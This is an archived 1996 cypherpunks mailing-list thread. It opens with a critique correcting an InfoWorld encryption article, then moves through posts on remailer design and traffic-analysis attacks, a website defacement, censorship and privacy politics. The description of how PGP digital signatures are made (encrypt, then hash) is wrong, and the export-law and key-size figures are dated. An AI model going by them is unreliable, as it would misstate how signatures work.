Even with such serious issues still up in the air, today's encryption and certification products can offer a great deal of protection, especially if the Internet or a wide area intranet is becoming a serious business tool for a particular organization, and it can't wait for a de facto standard to emerge. For those with the time to wait, the learning curve should be ascended now. Mass adoption of encryption technology is a virtual certainty. Those that ignore it will find their secrets being blabbed to the world. -------------------------------- Uses for encryption technology: * Sending sensitive data over publicly owned wide area links; * Sending sensitive data over Internet e-mail; * Electronic commerce; * Electronic data interchange over the Internet; * Order entry/order status over an intranet or the Internet; * Automated access to personnel files; * Storing sensitive data online; * Distribution, newsgroup style, of sensitive data. -------------------------------- Will the export of strong encryption be allowed? One of the problems with adopting encryption worldwide is that the federal government severely restricts its export. In fact, encryption technology is classified as munitions. Therefore, U.S. encryption vendors and corporations are forbidden from exporting and deploying versions that use more than a 40-bit key. However, companies in other countries, such as Japan, can freely sell encryption technology that uses the tougher 1,024-bit standard. The U.S. government isn't completely closing its eyes to the matter. In July, Vice President Al Gore unveiled a proposal that would create a key-escrow system allowing keys greater than 40 bits to be exported but requiring a third party to keep a copy of a key that could be used by law enforcement officials. (See U.S. considers easing encryption export laws.) 
And this past June, the Senate Subcommittee on Technology, Science, and Space heard a slew of testimony from encryption vendors and other experts on the problem. In fact, there are several bills pending in both houses of Congress that would relax the current export restrictions. The Security and Freedom Through Encryption Act was introduced in the House by Rep. Robert Goodlatte, R-Va. Meanwhile, The Encrypted Communications Privacy Act of 1996 was introduced in the Senate by Sen. Patrick Leahy, D-Vt., and the Promotion of Commerce On-Line in the Digital Era Act of 1996 also sits before the Senate. All three laws would relax the 40-bit restriction on keys as well as eliminate other restrictions on international use and development of encryption. Officials of U.S. corporations look forward to these changes and believe that such changes would improve their ability to compete in the international marketplace. "We're an international company, so we can't use the domestic version of Netscape [Communications Corp.'s Netscape Navigator]. And we can't trust the data using the international versions," says Richard Perlotto, corporate network security manager at VLSI Technology Inc., in Tempe, Ariz. Julie Bort is a free-lance writer based in Dillon, Colo. Please direct your comments to InfoWorld Electric News Editor Dana Gardner. Copyright © 1996 InfoWorld Publishing Company ------------------------- end silly article -------------------------- --------------------------- begin response --------------------------- -----BEGIN PGP SIGNED MESSAGE----- This references http://www.infoworld.com/cgi-bin/displayStory.pl?960830.crypt.htm Hi, First of all, I'd like to commend InfoWorld for covering a very important topic: cryptography. There are, however, some very significant flaws in the story, which I hope will be corrected soon.
As the article exists now, the information is sufficiently incorrect to be more harm than if the article didn't exist at all. Anyone using it as a guide will be only further confused.

The quotes are indented two spaces, with my comments below...

  Although no encryption algorithm is in and of itself crack-proof, several of them are so complex that they are virtually unbreakable. Coupled with proper implementation, authentication, and secure connections, encryption solutions can add a high level of security to any company's arsenal. However, it is an area that requires a knowledgeable person to make the purchasing decision because the technology is very complex, the best product selected will add a level of administration overhead, and numerous industry consortiums are developing competing APIs.

Also, there are a lot of people who simply don't know what they're doing when it comes to cryptography and security. Many products claim high degrees of security, but are hardly strong enough to keep someone's kid sister from deciphering the message.

  The key is the algorithm or mathematical formula that encodes the message itself. It must be sent to the message recipient so the message can be decoded, hence the term key.

Bzzzt. The formula is the algorithm. The key is a piece of data (often times, a passphrase, or a relatively small file) that is fed to the algorithm along with the data to be encrypted or decrypted to produce the desired result. The idea being that if an attacker knows what algorithm someone is using, and they have the encrypted message, they'll not be able to break the message unless they can also get their hands on the key. Hence, the key needs to be sufficiently large such that it can't be easily guessed by an attacker trying keys at random (or by effectively starting at "1" and working his way up.)

  The size of the key, measured in bits, determines how complex the algorithm is and how tough the code is to crack. The state of the art for encryption technology used exclusively within the United States is 1,024 bits. However, the maximum size key that is allowed to be exported is 40 bits.

Bzzzt. The complexity of the algorithm and key size are two different matters entirely. The level of complexity, by the way, typically increases the chance for error (in both algorithm design and implementation) more than adding any levels of security. A secure algorithm doesn't have to be complex. However, its key must be of sufficient length to be "computationally infeasible to break."

Let's take the example of a bicycle combination lock. It has a chain which will secure the bicycle to a rack; we'll assume that it's some newfangled sort of chain which is resistant to bolt cutters and all of those sorts of things. The security of this lock now rests in the actual locking mechanism. It's a very simple tumbler lock, perhaps having three or four digits between 0 and 9 that collectively make up the combination. The "key" is the combination in this case. The lock is simple, but it can be difficult to break, if the length of the key is long enough. If there is only one digit, there are 10 possible (10**1) keys. An attacker can quickly guess this and have a new bicycle. However, each time a digit is added to the key, it increases the number of combinations an order of magnitude. Two digits will have 100 possible (10**2) keys, three digits will have 1000 (10**3), four will have 10,000 (10**4) possible, etc.

The key size necessary to prevent breaking the solution will depend on your attacker. I mentioned the term "computationally infeasible" earlier. The term simply means that more time and money would need to be spent in breaking the key than the value of that which it locks. If a bike combination has 10**8 (100,000,000) possible combinations, and a thief can try 60 combinations per minute, it would take 165 weeks of continuous attempts to try every combination. By that time, enough lawns could be cut to buy two such bikes.

Because computers are binary, we work in bases of two, instead of base 10, which the bicycle combination lock uses, but the principle is the same. Each time you add a digit, you increase the number of keys by an order of magnitude (in a binary system, that means you double it, in a base 10 system, you increase it 10 times.) The key size of your algorithm, therefore, must be large enough to prevent an attacker from having any benefit to recovering that which is encrypted.

  Keys come in two flavors: symmetrical, or public key model; and asymmetrical, or public key/private key model.

Symmetric cryptosystems are sometimes known as "conventional." Asymmetric cryptosystems are known as "public key" ciphers. (Public key/private key *is* the public key model, and an asymmetric cipher!) Symmetric ciphers require the same key to encrypt and decrypt. If you imagine the encryption formula on the left side, and decryption on the right, you apply the same key to both sides in order to encrypt or retrieve the plaintext. Hence, the name "symmetric." Systems which use a different key to encrypt from the key to decrypt, therefore, are asymmetrical.

The note about key sizes is also misleading: conventional cryptosystems require a much, much smaller key for security than do public key cryptosystems. Because the math is different, a 128 bit key on a conventional algorithm is roughly the same security as a 2304 bit asymmetric cipher key. The "state of the art" in symmetric cryptosystems is about 128 bits. In this type of system, the government does not allow export of keys greater than 40 bits. Using a 1024 bit key in a symmetric cipher would provide an insane level of security, but would also be very, very slow to use.

  A symmetrical key uses the same algorithm to encode and decode a message. This is the technique used by the public key encryption program Pretty Good Privacy (PGP).

This is wrong, I will explain later.

  PGP assumes what security experts call the peer trust model. That is, the sender knows and trusts the receiver and is therefore perfectly comfortable in sending the key on its way. Herein lies the "pretty good" part of the privacy. Although the algorithm itself makes the message difficult to crack, the key exchange is only pretty good when compared with other methods.

VERY WRONG! I'll explain this also later.

  On the other hand, the great advantage to PGP is that it creates no key management overhead, which is the biggest drawback of asymmetrical keys.

Key management is the biggest problem for the keys of symmetric ciphers, not asymmetric ciphers.

  In the asymmetrical model, users have a public key stored somewhere that is available. Should someone want to send an encrypted message, the sender locates the public key of the recipient, encodes the message, and sends it off. The receiver then uses a private key to decode the message. The private key is different from the public key, but they are mathematically linked so that the private key is capable of decoding the message.

Entirely correct.

  Public/private key exchange is the technique used by RSA Data Security Inc., which was recently sold to Security Dynamics Inc., in Bedford, Mass. RSA uses a technology that is actually an adaptation of the decade-old National Institute of Standards and Technology's peer-trust Data Encryption Standard (DES), still used in many products. DES is a method of grabbing random keys for each encryption task, rather than using the same key repeatedly. Cryptographers say that RSA solves some problems, such as the trust issue but generates others.

ACK! NO! RSA is an asymmetric cipher. DES is a symmetric cipher. That's the only difference. How keys are managed is entirely dependent on how the system is implemented. Anything can be assigned a key "at random," by allowing a user's passphrase to be the key.

Now it seems like a good time to explain the way that PGP (and Netscape's encryption system) works. Asymmetric ciphers, such as RSA, are very slow. Their key management, however, is very nice and flexible, which is why we like to use them. In a system that requires flexible key management, a high level of security, as well as decent performance, both symmetric and asymmetric ciphers are used.

If Alice wants to send Bob a message in such a system (like PGP), she simply composes her message, and tells her mailer to PGP-encrypt the message. PGP will find Bob's public key (either from her key ring, or from a database, perhaps, but it doesn't matter.) The message will then be encrypted with a random SYMMETRIC key (in the case of PGP, it will use the 128-bit-key IDEA cipher). That session key, then, will be encrypted using Bob's public key, and both the session key and message will be sent off (in one PGP encrypted message). Bob will see his mail from Alice, and then his PGP will decrypt the session key, and apply it to the encrypted message, yielding the plaintext: Alice's message.

So, in PGP, the MESSAGE is encrypted using a random session key (which is symmetric.) The SESSION KEY, then, is encrypted using the recipient's public key.

The rest of the article seems to be generally on track, but certificates and signatures have been confused. A certificate is a cryptographically secure message that states the identity of the presenter. In that way, the analogy to a driver's license is correct. A trusted third party issues the certificate. A digital signature, however, is the cryptographic equivalent of signing your name to something. For example, with PGP, I can digitally sign an email message. PGP does this by taking the message, encrypting it with my PRIVATE key, running the result of that through a secure one-way function ("hash"), and attaching the result to the bottom of the message. A user can then verify that the signature is legitimate by applying my PUBLIC key to the message, and running the result back through the hash, and comparing the two. If they match, the signature is good, if not, something is amiss. (PGP, naturally, handles all of this automatically.)

  Therefore, U.S. encryption vendors and corporations are forbidden from exporting and deploying versions that use more than a 40-bit key. However, companies in other countries, such as Japan, can freely sell encryption technology that uses the tougher 1,024-bit standard.

The two are being confused again. See my earlier note about comparable keys.

If you have further questions, please feel free to contact me. If there is interest, I would also be willing to write a series on how to choose a cryptosystem. I am very concerned about the state of cryptographic knowledge in the industry. The area is vital for successful companies' IS departments to understand, and understand well. Yet, the general level of knowledge is abysmally low. I applaud efforts by InfoWorld to increase coverage of this important topic, but I emphasize that the material presented must be correct. Many vendors are currently offering solutions they call secure. Without an understanding of how cryptography works, an IS organization is completely unable to choose between that which is good security and that which is snake oil.

A "snake oil FAQ" is being drafted, but is not yet available. In the meantime, there are cryptography FAQs available from ftp://rtfm.mit.edu/pub/usenet-by-group/sci.crypt/

- --
C Matthew Curtin MEGASOFT, INC Chief Scientist
I speak only for myself. Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?
-----END PGP SIGNATURE----- ---------------------------- end response ---------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From jwilk at iglou.com Mon Sep 2 11:44:22 1996 From: jwilk at iglou.com (Blake Wehlage) Date: Tue, 3 Sep 1996 02:44:22 +0800 Subject: free speech online Message-ID: At 02:47 AM 9/2/96 EDT, patrick b cummings wrote: >I agree that there should be free speech on the net. Someone should >start a petition and get as many people to sign it as possible. > Patrick.... I have a deal for ya.... you don't write this list for a week? or at least keep the spams to a minimum. Post the hacker requests to a hacker-mailing list (what a concept). Have a nice day! ========================================== Blake Wehlage World's Youngest Cypherpunk 2400bps is the net's old people drivers From whgiii at amaranth.com Mon Sep 2 11:44:25 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 3 Sep 1996 02:44:25 +0800 Subject: Cypherpunk Mailboxes? Message-ID: <199609021534.KAA26279@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- Hi, I have a thought for addressing the anon. problem. We could create a network of anonymous remailers with mailboxes. All messages in the mailboxes are stored encrypted. No information about the users is kept. Users would be given x K of mailbox space.
We could use PGP keys for encrypting the messages. Each user would have his own key pair for his anonymous mailbox. Any plain text messages received to the server would be encrypted on receipt. Let the government's subpoena away. :) "Sorry we don't have user addresses, no I can't decrypt those messages Senator." What do you think? - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From pjb at 23kgroup.com Mon Sep 2 11:48:41 1996 From: pjb at 23kgroup.com (Paul J. Bell) Date: Tue, 3 Sep 1996 02:48:41 +0800 Subject: Moscowchannel.com hack Message-ID: <9609021545.AA15755@23kgroup.com> FWIW, not even root can unmount a file system that is busy.
-paul > From cypherpunks-errors at toad.com Sun Sep 1 18:17:12 1996 > Subject: Re: Moscowchannel.com hack > To: snow at smoke.suba.com (snow) > Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT) > Cc: joelm at eskimo.com, Cypherpunks at toad.com > Reply-To: ichudov at algebra.com (Igor Chudov) > From: ichudov at algebra.com (Igor Chudov @ home) > X-No-Archive: yes > Organization: Bool Sheet Software > X-Mailer: ELM [version 2.4 PL24 ME7] > Content-Type> : > text> > Sender: owner-cypherpunks at toad.com > Content-Length: 689 > > snow wrote: > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > > site was hacked and altered by someone who didn't seem to like Russians all > > > Just a matter of time before some builds a dedicated Satan type tool that > > > scans for HTTP server holes or messed up file permissions to make locating > > > potential victims easy. > > Write your web site to a CD-ROM and hard-code the base directory into the > > webserver. > > A hacker who has root can forcibly unmount the cdrom and mount another > directory on that node. Not a good solution. > > - Igor. > From ichudov at algebra.com Mon Sep 2 11:56:30 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Tue, 3 Sep 1996 02:56:30 +0800 Subject: Moscowchannel.com hack In-Reply-To: <9609021545.AA15755@23kgroup.com> Message-ID: <199609021606.LAA06211@manifold.algebra.com> Paul J. Bell wrote: > > FWIW, not even root can unmount a file system that is busy. > > -paul Well, root can kill all processes that use the mounted directory. 
igor > > > From cypherpunks-errors at toad.com Sun Sep 1 18:17:12 1996 > > Subject: Re: Moscowchannel.com hack > > To: snow at smoke.suba.com (snow) > > Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT) > > Cc: joelm at eskimo.com, Cypherpunks at toad.com > > Reply-To: ichudov at algebra.com (Igor Chudov) > > From: ichudov at algebra.com (Igor Chudov @ home) > > X-No-Archive: yes > > Organization: Bool Sheet Software > > X-Mailer: ELM [version 2.4 PL24 ME7] > > Content-Type> : > text> > > Sender: owner-cypherpunks at toad.com > > Content-Length: 689 > > > > snow wrote: > > > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > > > site was hacked and altered by someone who didn't seem to like Russians all > > > > Just a matter of time before some builds a dedicated Satan type tool that > > > > scans for HTTP server holes or messed up file permissions to make locating > > > > potential victims easy. > > > Write your web site to a CD-ROM and hard-code the base directory into the > > > webserver. > > > > A hacker who has root can forcibly unmount the cdrom and mount another > > directory on that node. Not a good solution. > > > > - Igor. > > > - Igor. From mycroft at actrix.gen.nz Mon Sep 2 12:00:17 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Tue, 3 Sep 1996 03:00:17 +0800 Subject: Free Speech and List Topics In-Reply-To: <199609020517.WAA06504@netcom.netcom.com> Message-ID: <199609021414.CAA29655@mycroft.actrix.gen.nz> qut at netcom.com (Dave Harman OBC) wrote: How about supporting the effort for comp.cypherpunks ? God forbid. Isn't there enough off-topic noise on the list for you? I'd be glad to email you a bunch of "MAKE MONEY FA$T" and "Want XXX pictures in your mailbox?" messages every day, if not. About the need for limits for anonymity, guess what brought that on? Crime? Yes! 
The crime of the media monopoly violating the anti-trust acts, because people are ignorant enough to trust the mass media for their news. huh? -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- Without freedom of choice there is no creativity. -- Kirk, "The return of the Archons", stardate 3157.4 From declan at eff.org Mon Sep 2 12:39:48 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 3 Sep 1996 03:39:48 +0800 Subject: Bob Dole on Drugs In-Reply-To: <199609011633.LAA30982@manifold.algebra.com> Message-ID: The Post also noted -- and this was buried inside in a short article -- that Clinton had stepped up his attacks on drugs during his acceptance speech, which I intentionally missed. -Declan On Sun, 1 Sep 1996 ichudov at algebra.com wrote: > http://allpolitics.com/news/9608/31/radio.addresses/ > > ... snip ... > > Dole, who returned to Washington for Labor Day > weekend, also pledged to use the White House as a > bully pulpit to promote the "moral message" > against drugs and to criticize what he called the > entertainment industry's glamorization of drug use. > > On Sunday, he is to address the convention of the > National Guard Association of the United States > during which he's expected to propose that the > military be enlisted to assist in a renewed war on > drugs. 
> // declan at eff.org // I do not represent the EFF // declan at well.com // From eitland at blue.weeg.uiowa.edu Mon Sep 2 12:44:14 1996 From: eitland at blue.weeg.uiowa.edu (Brett Eitland) Date: Tue, 3 Sep 1996 03:44:14 +0800 Subject: desubscribe Message-ID: <322B2CF6.ECD@blue.weeg.uiowa.edu> desubscribe From ccarper at microsoft.com Mon Sep 2 12:49:58 1996 From: ccarper at microsoft.com (Christopher Carper) Date: Tue, 3 Sep 1996 03:49:58 +0800 Subject: desubscribe Message-ID: desubscribe From tcmay at got.net Mon Sep 2 12:51:40 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 03:51:40 +0800 Subject: Sharp Knives Message-ID: At 1:38 PM 9/2/96, Dave Harman OBC wrote: >In California, it's a felony to merely *own* a Ninja star. It's a >felony to carry a *concealed* knife, but carrying it openly in a >holster is legal. It's a felony for most people to carry a >concealed loaded handgun on the street only on a *second* offense. >It's a felony to merely *own* a switchblade, brass knuckles, etc. >Do our weapons laws sound strange? Are many of our weapons laws >stricter than countries like Sweden? Yes! Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were devised to control the coloreds, who could not afford the weapons of choice of whites and other gentlemen. Hence, a colored who gets picked up on some charge, or detained, can be jailed on a felony charge for having a pocketknife, or a sap, or brass knucks. Coloreds from Asia can be jailed for having the martial arts sorts of weapons. A white gets a misdemeanor charge for carrying a gun. (This analysis is not original with me. The gun magazines have noted the racist origins of misdemeanor/felony dichotomies for many years. One article I read a few years ago traced the precise times at which these laws came into being...mostly the times in various states corresponded with periods of high immigration of coloreds to major cities.)
Here in California there's a bill pending in the legislature which would decriminalize the carrying of a pocketknife that can be opened with one hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with thumb holes or studs). Even though such knives are openly sold in every sporting goods store I have ever been in, and are carried by a truly large fraction of the population, such knives are currently classified as "switchblades" and can be prosecuted as a felony. A good way to selectively harass someone. Interestingly, it was the District Attorneys lobbying group in California which made the difference: they argued that such laws are unenforceable or are selectively enforced. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From aba at dcs.ex.ac.uk Mon Sep 2 13:03:46 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Tue, 3 Sep 1996 04:03:46 +0800 Subject: strengthening remailer protocols In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk> Message-ID: <199609011430.PAA00133@server.test.net> Peter Allan writes on cpunks: > [re-encrypting as a mechanism to prevent an attacker in a spamming > attack recognizing his own messages] The attack Peter is hoping to frustrate is as follows: target message being sent from Alice to Bob through remailer R. The attacker in an active `spam' attack floods remailer R so that he will recognize the target message and its destination.
Another approach to making the transmitted message unrecognizable to its owner would be to finish the implementation of D-H key exchange in mixmaster. (The version I am looking at (2.0.3) does not have the D-H key exchange and direct socket communication implemented, rather it delivers mail by sendmail, I believe). As a bonus this provides forward secrecy, so that not even a subpoenaed remailer operator would be able to reconstruct the destination. You can still do a spamming attack by recognizing the destination, rather than the message: Eve forwards enough messages to remailer R to flush the target message. Each of Eve's messages is headed to a known (to Eve) address. Say the remailer R has a buffer of 10 messages, if Eve sends 9 messages, 3 to each of remailers R2, R3, and R4. Eve can then determine the destination of the target message: the remailer which gets 4 messages is the destination remailer. (Here my knowledge of mixmaster's workings is wearing thin, but I believe it does these things, or provides facilities so that the operators/users can make sure these things happen). The way that this kind of attack is frustrated is that dummy messages are created as cover traffic by the remailer, and that at some points messages can be swallowed by a remailer as junk messages. Sufficient junk cover traffic would ensure that even with a spamming attack the destination would not be known immediately because the attacker can distinguish the target message from the junk. Ultimately a good way to foil this attack in general is to have each remailer send a fixed amount of mail to each other remailer in cycles. No traffic analysis if all remailers get equal traffic. The only entry point for analysis then is the entry and exit points. The active spam attack then would be to block, or delay all entry points into the remailer net, apart from the target message. The only messages in the network would then be the spam traffic, and the target message.
When the target message leaves the net, Eve knows the destination. To hinder this attack, the remailers could generate and mail to previous users junk mail. Over a long time, statistical attacks could perhaps be built on a pair of users who communicated frequently. The ultimate solution to this is for the users also to receive fixed amounts of junk each day. Starting to sound like similar overheads to a DC net, huh?

Peter's other suggestions of adding random diversions sound like reasonable ways to add another form of cover traffic, and should help make life harder for the attacker,

Adam
--
#!/bin/perl -sp0777i

At 6:29 AM 9/2/96, Bill Stewart wrote:

>While Tim's article title was clearly intended to be provocative,

Indeed, I write many things to be _provocative_. Not to be insulting, but to challenge orthodoxies. And when I hear mealy-mouthed platitudes along the lines of "foreigners do not understand the special needs of our nation, and do not understand why Benevolent Father Yew channels our thoughts in more productive directions," I have to call a spade a spade.

(quoting James Seng)
>>In addition, you need to see the method of censorship deployed in
>>Singapore. For press media like papers and magazine, it is done in a
>>passive manner. They _do not_ read every issue of every magazine available
>>in Singapore. They only do so when there is enough complains.
>
>This also means you don't know what is safe to print and what isn't.
>You have to restrict yourself very strongly, because otherwise
>some politically influential person will complain to the government,
>and you go to jail. At least if the government tells you what
>the rules are, you know it's safe to say things that don't violate them.

Yes, what James Seng calls a "passive manner" is often worse than censorship in a direct manner. Psychologists would mention "random reinforcement" at this point.
When there is _direct_ censorship, with clearly defined rules, publishers will skate as close to the edge of the envelope as they can, and even test the limits.

When there is _passive_ or _vague_ censorship, with rules not carefully spelled out but with the possibility of prosecution and jail time always looming, then publishers and others will rein themselves in, taking the cautious route. This is, of course, often the result desired, that people invoke "the policeman inside" (to use the Burroughs term).

This is really the essence of a "terror state." The rules are not known, the fear of a knock on the door is omnipresent, and the Beloved Ruler may dispatch his enforcers on a whim.

>>ps: Sorry for the off-topic discussion.
>
>It's not off-topic. Building tools to prevent censorship is
>distinctly on-topic for cypherpunks, and an occasional digression into
>whether it's a good idea is worthwhile.

Exactly. A discussion of routing-around Censorpore's policies is at least as on-topic as the 17th discussion of some snake oil cipher.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From banisar at epic.org Mon Sep 2 13:14:51 1996
From: banisar at epic.org (Dave Banisar)
Date: Tue, 3 Sep 1996 04:14:51 +0800
Subject: National ID Card Web Pages
Message-ID:

EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE

The London-based human rights watchdog Privacy International (PI) has just opened an extensive web page on National ID cards.
The initiative comes in the wake of pending efforts in the United States, Canada and United Kingdom to implement national ID card systems.

The page contains a 7,000 word FAQ (Frequently Asked Questions) on all aspects of ID cards and their implications. Also included in the PI documents is a paper describing successful campaigns opposing ID cards in Australia and other countries. The page also has links to numerous other sites and documents.

PI Director Simon Davies said he hoped the page would help promote debate about the cards, "ID cards are often introduced without serious discussion or consultation. The implications are profound, and countries planning to introduce them should proceed with caution."

"The existence of a card challenges important precepts of individual rights and privacy. At a symbolic and a functional level, ID cards are often an unnecessary and potentially dangerous white elephant. They are promoted by way of fear-mongering and false patriotism, and are implemented with scant regard for serious investigation of the consequences," he said.

The URL is: http://www.privacy.org/pi/activities/idcard/

PI has also set up an auto response function for the FAQ document. Its address is: idcardfaq at mail.privacy.org

Privacy International is an international human rights group concerned with privacy and surveillance issues. It is based in London, UK. For further information contact the Privacy International Washington Office at +1.202.544.9240 or email pi at privacy.org.
PI's web page is available at: http://www.privacy.org/pi/

_________________________________________________________________________
Subject: National ID Card Web Pages
_________________________________________________________________________
David Banisar (Banisar at privacy.org)       * 202-544-9240 (tel)
Privacy International Washington Office  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301      * HTTP://www.privacy.org/pi/
Washington, DC 20003

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 13:14:52 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 3 Sep 1996 04:14:52 +0800
Subject: Modem tax again?
Message-ID: <01I9075ZGV3O9JDI20@mbcl.rutgers.edu>

As I recall, the alleged "subsidy" consists of lack of payments so rural areas can have subsidized phone service - thus making their costs borne by everyone else.
-Allen

> _________________________________________________________________
> Avis
> _________________________________________________________________
> INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 San Francisco Examiner
> SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end
> a subsidy that has kept down the cost of on-line service, local phone
> companies here have presented the Federal Communications Commission
> with studies arguing that Internet users are overtaxing phone networks
> and ought to pay more for monthly service.
> The studies, one of which was published on the Internet, argue that a
> 13-year-old subsidy lets Internet service providers (ISPs) pay a
> fraction of what a long distance company pays to get a phone line,
> even though Internet calls may use more phone system capacity than
> voice traffic.
[...]
> For their part, ISPs are alarmed at the remote possibility that the
> FCC might let phone companies raise their monthly costs from the
> current monthly average of $30 to anything approaching the $600 that
> some long distance carriers pay for a phone line.
> "If we had to pay anything like long distance access charges, it would
> put all the ISPs out of business," said Ronald Plesser, the
> Washington, D.C., attorney who represents the Commercial Internet
> Exchange, an ISP trade group.
> FCC staff attorney Kevin Werbach said the subsidy began in 1983, when
> the five-member federal commission created a special rate to encourage
> the growth of on-line services, voicemail companies and other emerging
> industries that offered enhanced electronic services over phone lines.
> In 1987, the FCC considered ending the subsidy but backed down after
> public protest over what came to be characterized as the "modem tax."
> Given the growth in on-line usage, ISPs assume any talk of ending the
> subsidy would create a bigger backlash today.
> "There are a minimum of 20 million and perhaps as many as 40 million
> on-line and Internet users and many of them are registered voters,"
> said William Schrader, president of PSI Net, an ISP in Herndon, Va.
> Schrader said when he visited several FCC members recently, he
> suggested that many of those users would be happy to send a letter of
> protest to FCC Chairman Reed Hundt.
[...]
> Copyright © 1996 Nando.net

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 13:16:26 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 3 Sep 1996 04:16:26 +0800
Subject: More child pornography nonsense
Message-ID: <01I906YVP1M89JDI20@mbcl.rutgers.edu>

> webslingerZ
> _________________________________________________________________
> POLICE SEARCH INTERNET FOR CHILD SEX ABUSERS
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> STOCKHOLM, Sweden (Aug 31, 1996 00:11 a.m. EDT) - Police across Europe
> widened their net Friday to track down a pedophile network which is
> spreading increasingly to the hard-to-detect Internet, while at an
> international conference, Southeast Asia was cast as a major
> destination for child sex tourists.
> At the World Congress Against Commercial Sexual Exploitation of
> Children, which has attracted over 1,000 delegates to Stockholm from
> 130 countries, campaigners outlined measures to crack down on
> pedophiles' use of the Internet.
> Norway's ombudsman for children, Trond Waage, said to date there was
> very little action that could be taken to stop the distribution of
> child pornography on the Internet.
> But he said the establishment last week of an international body to
> monitor child pornography on the net, a task taken on by the Norwegian
> branch of Save the Children, was firm action against pedophiles using
> the net.
> "This is a kind of a cybercop," Waage told reporters.
> "We need some visible cops on the net. If you undertake these kinds of
> criminal activities someone will monitor you."
> Save the Children will try to monitor any child pornography on the
> Internet and is encouraging other net surfers to pass on information
> that will be handed to the police.

Want to bet how fast they'll be mail-bombed? Cops on the net are _not_ popular, no matter what they're doing.
This fact is especially true when there's no actual harm taking place (unlike, say, spamming) - the harm has _already_ taken place by the time the material is on the Internet. Should we ban films with violence because they _might_ be snuff films?
-Allen

From qut at netcom.com Mon Sep 2 13:16:35 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 04:16:35 +0800
Subject: Free Speech and List Topics
In-Reply-To:
Message-ID: <199609021759.KAA00489@netcom21.netcom.com>

! At 5:17 AM 9/2/96, qut wrote:
!
! >About the need for limits for anonymity, guess what brought that on?
! >Crime? Yes! The crime of the media monopoly violating the anti-trust
! >acts, because people are ignorant enough to trust the mass media for
! >their news.

I just mean to throw the media's lies right back at them. If crypto anonymity is considered to lend itself to crime, no doubt by the same logic, mass media collusion lends itself to crime. And American mass media collusion IS a crime, crypto anonymity is not. It's been a hundred years since it became illegal to violate the Sherman Anti-Trust Act.

! No self-respecting Cypherpunk thinks the Antitrust Act and related acts are
! worthy of enforcement.
!
! (Think of how the technology we support will tend to allow new avenues for
! price collusion, interlocking directorates, new forms of business combines,
! unreadable secure communications with foreign competitors, and so on, all
! things the Antitrust regulators are already growing worried about.)

And should! No doubt the media is colluding for criminal purposes and shady outfits like The New York Times should be seized and analysed by Department Of Justice anti-trust investigators.

From tcmay at got.net Mon Sep 2 13:19:45 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 04:19:45 +0800
Subject: The Earliest CP Remailer *DID* Emphasize Anonymity
Message-ID:

At 7:22 AM 9/2/96, Bill Stewart wrote:

>From what I know of remailer history, the main original goal
>of the cypherpunks-style remailer was to provide
